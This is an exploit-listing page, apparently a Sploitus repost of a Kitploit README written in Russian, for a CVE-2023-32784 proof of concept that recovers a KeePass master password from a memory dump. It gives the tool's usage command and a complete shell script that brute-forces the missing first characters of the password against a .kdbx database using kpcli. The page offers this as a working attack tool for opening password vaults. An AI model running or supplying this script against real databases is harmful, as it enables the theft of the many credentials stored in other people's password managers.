Sploitus

Exploit for CVE-2023-32784

kitploit · 2026-08-25

Exploit Code

MARKDOWN29 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DAWNL3SS-CVE-2023-32784
# keepass-dump-masterkey

## Использование

`python3 poc.py <PathToDmp>`

## Предварительный просмотр

![](https://assets.kitploit.com/production/public/readmes/24529/984095db42d39214f89c6606da237729c94b24f91cb4d7dd805308ff04b83255.png)

Напоминаем: первый символ не может быть найден в дампе, а для второго скрипт выдаст лишь несколько возможных вариантов. В любом случае рекомендуем запустить брутфорс по 2 символам с помощью скрипта ниже

root@kitploit:~
    
    
    #!/bin/sh
    # Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
    while read i
    do
        echo "Using password: \"$i\""
        echo "$i" | kpcli --kdb=$1 && exit 0
    done < $2
    
    

> Этот скрипт отлично работает на физической машине, но на виртуальных машинах он, похоже, нестабилен

Кстати: скрипт на Python, представленный в этом проекте, следует за прочтением следующего проекта: https://github.com/vdohney/keepass-password-dumper